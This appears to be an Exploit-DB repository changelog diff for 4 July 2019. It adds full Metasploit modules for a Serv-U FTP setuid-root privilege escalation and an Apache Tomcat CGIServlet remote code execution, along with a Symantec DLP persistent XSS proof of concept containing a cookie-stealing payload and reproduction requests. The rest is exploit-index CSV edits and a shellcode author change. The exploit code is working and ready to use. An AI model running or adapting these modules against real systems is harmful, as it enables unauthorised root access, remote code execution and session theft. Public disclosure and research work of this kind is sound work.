DB: 2019-07-04

5 changes to exploits/shellcodes

Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)

Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)

AZADMIN CMS 1.0 - SQL Injection
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting
WorkSuite PRM 2.4 - 'password' SQL Injection
CiuisCRM 1.6 - 'eventType' SQL Injection
Varient 1.6.1 - SQL Injection
WorkSuite PRM 2.4 - 'password' SQL Injection
CiuisCRM 1.6 - 'eventType' SQL Injection
Varient 1.6.1 - SQL Injection

Symantec DLP 15.5 MP1 - Cross-Site Scripting

Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)

exploits/linux/local/47072.rb

@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Serv-U FTP Server prepareinstallation Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on systems running
+        Serv-U FTP Server versions prior to 15.1.7.
+
+        The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
+        in a call to `system()`, without validation, when invoked with
+        the `-prepareinstallation` flag, resulting in command execution
+        with root privileges.
+
+        This module has been tested successfully on Serv-U FTP Server
+        version 15.1.6 (x64) on Debian 9.6 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Guy Levin', # @va_start - Discovery and exploit
+          'bcoles'     # Metasploit
+        ],
+      'DisclosureDate' => '2019-06-05',
+      'References'     =>
+        [
+          ['CVE', '2019-12181'],
+          ['EDB', '47009'],
+          ['PACKETSTORM', '153333'],
+          ['URL', 'https://github.com/guywhataguy/CVE-2019-12181'],
+          ['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'],
+          ['URL', 'https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
+          ['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'],
+          ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultOptions' =>
+        {
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork'      => true,
+          'WfsDelay'         => 30
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('SERVU_PATH', [true, 'Path to Serv-U executable', '/usr/local/Serv-U/Serv-U'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def servu_path
+    datastore['SERVU_PATH']
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def check
+    unless command_exists? 'bash'
+      vprint_error 'bash shell is not available'
+      return CheckCode::Safe
+    end
+    vprint_good 'bash shell is available'
+
+    unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
+      vprint_error "#{servu_path} is not executable"
+      return CheckCode::Safe
+    end
+    vprint_good "#{servu_path} is executable"
+
+    unless setuid? servu_path
+      vprint_error "#{servu_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{servu_path} is setuid"
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    if nosuid? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 10..15}"
+    @payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx @payload_path, generate_payload_exe
+
+    argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"}
+    cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'}
+    vprint_status "Executing command: #{cmd}"
+    cmd_exec cmd
+
+    unless setuid? @payload_path
+      fail_with Failure::Unknown, 'Failed to set payload setuid root'
+    end
+    print_good "#{@payload_path} setuid root successfully"
+
+    print_status 'Executing payload...'
+    res = cmd_exec "#{@payload_path} &"
+    vprint_line res
+  end
+
+  def on_new_session(session)
+    if session.type.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.fs.file.rm @payload_path
+    else
+      session.shell_command_token "rm -f '#{@payload_path}'"
+    end
+  ensure
+    super
+  end
+end

exploits/linux/webapps/47059.txt

@@ -3,7 +3,6 @@
 # Date: 6/29/2019
 # Exploit Author: Joey Lane
 # Vendor Homepage: https://www.cyberpowersystems.com
-# Software Link: https://dl4jz3rbrsfum.cloudfront.net/software/ppbe340-linux-x86_64.sh
 # Version: 3.4.0
 # Tested on: Ubuntu 16.04
 # CVE : Pending

exploits/multiple/webapps/47071.txt

@@ -0,0 +1,81 @@
+# Exploit Title: Persistent XSS on Symantec DLP <= 15.5 MP1
+# Date: 2019-06-21
+# Exploit Author: Chapman Schleiss
+# Vendor Homepage: https://www.symantec.com/
+# Software Link: https://support.symantec.com/us/en/mysymantec.html
+# Version: <= 15.5 MP1
+# CVE : 2019-9701
+# Advisory-URL: https://support.symantec.com/us/en/article.SYMSA1484.html
+# Hot Fix: https://support.symantec.com/us/en/article.ALERT2664.html
+
+Description
+---------------
+Persistent XSS via 'name' param at
+/ProtectManager/enforce/admin/senderrecipientpatterns/list
+
+
+Payload: ' oNmouseover=prompt(document.domain,document.cookie) )
+Browser: Firefox 64, IE 11
+Date Observed: 15 January 2019
+
+
+Reproduction POST
+-----------------
+POST
+/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update
+HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 558
+Connection: close
+
+name=%27+oNmouseover%3Dprompt%28document.domain%2Cdocument.cookie%29+%29&description=some_text&userPatterns=test%
+40test.com&ipAddresses=192.168.1.1&urlDomains=mail.company.com
+&id=41&version=30
+
+Reproduction GET
+----------------
+GET /ProtectManager/enforce/admin/senderrecipientpatterns/list HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Connection: close
+
+Reproduction Response
+---------------------
+<div id="messages-section">
+  <div class="message-pane alert-pane">
+      <div class="alert-message">
+        <div class="yui3-g message-pane-scroll">
+          <div class="yui3-u-1-24 message-icon">
+              <img src="/ProtectManager/graphics/success_icon.gif" alt="Success" width="19" height="19" />
+          </div>
+          <div class="yui3-u-11-12 wrapping-text">
+              <div id="web-status-message-163" class="message-content"> Recipient pattern '' oNmouseover=prompt(document.domain,document.cookie) )' was saved successfully.               </div>
+          </div>
+          <div class="yui3-u-1-24">
+              <div class="message-pane-actions">
+          <a href="#" class="message-back-to-element hidden action-icon">
+        <img src="/ProtectManager/graphics/general/scroll_back_16.png" alt="" title="Show affected object"/>
+          </a>
+          <a href="#" class="message-pane-close action-icon">
+        <img src="/ProtectManager/graphics/general/cancel_blue_16.png" alt=""  title="Close message bar"/>
+          </a>
+      </div>
+          </div>
+        </div>
+      </div>
+  </div>
+</div>

exploits/windows/remote/47073.rb

@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'            => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
+      'Description'     => %q{
+        This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
+        enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
+        system commands, and gain remote code execution.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Yakov Shafranovich', # Original discovery
+          'sinn3r'              # Metasploit module
+        ],
+      'Platform'        => 'win',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Targets'         =>
+        [
+          [ 'Apache Tomcat 9.0 or prior for Windows', { } ]
+        ],
+      'References'      =>
+        [
+          ['CVE', '2019-0232'],
+          ['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
+          ['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
+        ],
+      'Notes'           =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'CmdStagerFlavor' => 'vbs',
+      'DefaultOptions'  =>
+        {
+          'RPORT' => 8080
+        },
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Apr 10 2019', # Date of public advisory issued by the vendor
+      'DefaultTarget'   => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [false, 'Override check result', false])
+      ])
+
+    deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
+  end
+
+  def check
+    sig = Rex::Text.rand_text_alpha(10)
+    uri = normalize_uri(target_uri.path)
+    uri << "?&echo+#{sig}"
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    unless res
+      vprint_error('No Response from server')
+      return CheckCode::Unknown
+    end
+
+    if res.body.include?(sig)
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts={})
+    # Our command stager assumes we have access to environment variables.
+    # We don't necessarily have that, so we have to modify cscript to a full path.
+    cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')
+
+    uri = normalize_uri(target_uri.path)
+    uri << "?&#{CGI.escape(cmd)}"
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'No response from server')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+    end
+  end
+
+  # it seems we don't really have a way to retrieve the filenames from the VBS command stager,
+  # so we need to rely on the user to cleanup the files.
+  def on_new_session(cli)
+    print_warning('Make sure to manually cleanup the exe generated by the exploit')
+    super
+  end
+
+  def exploit
+    print_status("Checking if #{rhost} is vulnerable")
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+
+      print_warning('Target does not appear to be vulnerable.')
+    end
+
+    print_status("#{rhost} seems vulnerable, what a good day.")
+    execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
+  end
+end

files_exploits.csv

@@ -10564,6 +10564,7 @@ id,file,description,date,author,type,platform,port
 47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
 47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
 47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
+47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17518,6 +17519,7 @@ id,file,description,date,author,type,platform,port
 47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
 47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
 47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
+47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41437,14 +41439,14 @@ id,file,description,date,author,type,platform,port
 47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php,
 47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple,
 47033,exploits/hardware/webapps/47033.html,"Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution",2019-06-25,XORcat,webapps,hardware,
-47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,
+47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,80
 47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
-47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
-47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
+47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
+47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
 47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80
-47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
-47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
-47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,
+47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80
 47059,exploits/linux/webapps/47059.txt,"PowerPanel Business Edition - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,linux,
 47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,
 47061,exploits/multiple/webapps/47061.txt,"SAP Crystal Reports - Information Disclosure",2019-07-01,"Mohamed M.Fouad",webapps,multiple,
@@ -41454,3 +41456,4 @@ id,file,description,date,author,type,platform,port
 47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
 47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
 47069,exploits/php/webapps/47069.py,"Centreon 19.04  - Remote Code Execution",2019-07-02,Askar,webapps,php,
+47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443

files_shellcodes.csv

@@ -986,4 +986,4 @@ id,file,description,date,author,type,platform
 47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
-47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
+47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86

shellcodes/linux_x86/47068.c

@@ -2,7 +2,7 @@
 ;Category: Shellcode
 ;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique (21
 bytes)
-;Author: kiriknik
+;Author: Kirill Nikolaev
 ;Date: 01/07/2019
 ;Architecture: Linux x86